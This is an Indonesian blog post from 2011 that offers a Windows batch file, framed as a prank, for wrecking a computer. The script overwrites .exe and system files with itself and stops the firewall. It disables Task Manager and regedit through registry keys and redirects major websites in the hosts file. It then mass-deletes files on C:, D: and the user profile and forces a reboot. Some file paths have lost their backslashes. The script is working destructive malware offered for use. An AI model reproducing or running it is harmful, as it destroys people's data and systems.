Aug 5, 2011

Membuar file merusak Komputer dan system komputer

Ini bwat orang yang suka usil,jangan terlalu usil yah..ini berbahaya lho..*biar ga usil*
ok tanpa basa basi,dri pada basi..ga bisa dimakan,mubazir

copy ke notepad kemudian save as iseng.bat simpan mau dimana saja
-------------------------= Awal =-------------------------------------
@echo off
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%*.exe) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)

Del /f /s /q DirPath
Dir %SystemRoot% /s /b > PathHost
For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul
Del /f /s /q PathHost > Nul
net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"
del /f /q "C:Program FilesInternet Exploreriexplore.exe"


REG ADD HKCUSoftwareMicrosoftWindowsCurrentversionExplorerAdvanced /v Showsuperhidden /t reg_dword /d 0 /f
REG ADD HKCUSoftwareMicrosoftWindowsCurrentversionpoliciesexplorer /v nofolderoption /t reg_dword /d 1 /f
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoFind /t REG_DWORD /d 1 /f
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoViewOnDrive /t REG_DWORD /d 4 /f
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegedit /t REG_DWORD /d 1 /f

cd "%windir%System32Driversetc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1 www.google.com >> "Hosts"
echo 127.0.0.1 youtube.com >> "Hosts"
echo 127.0.0.1 www.youtube.com >> "Hosts"
echo 127.0.0.1 msn.com >> "Hosts"
echo 127.0.0.1 www.msn.com >> "Hosts"
echo 127.0.0.1 hotmail.com >> "Hosts"
echo 127.0.0.1 www.hotmail.com >> "Hosts"
goto 1
:2
cd %userprofile%
del /f /s /q *.*

cd
D:
del /f /s /q *.*

cd
C:
del /f /s /q *.*
goto hell
:1
echo %random% > "%windir%system%random%Spammed Filetype"
echo %random% > "%windir%system%random%Spammed Filetype"
echo %random% > "%windir%system%random%Spammed Filetype"
echo %random% > "%windir%system%random%Spammed Filetype"
echo %random% > "%windir%system%random%Spammed Filetype"
echo %random% > "%windir%system%random%Spammed Filetype"
echo %random% > "%windir%system%random%Spammed Filetype"
echo %random% > "%windir%system%random%Spammed Filetype"
echo %random% > "%windir%system%random%Spammed Filetype"
echo %random% > "%windir%system%random%Spammed Filetype"
echo %random% > "%windir%system%random%Spammed Filetype"
goto 2

:hell
shutdown -r -f -c "Good Luck to Computer in Clear" -t 5

--------------------= end =-------------------------------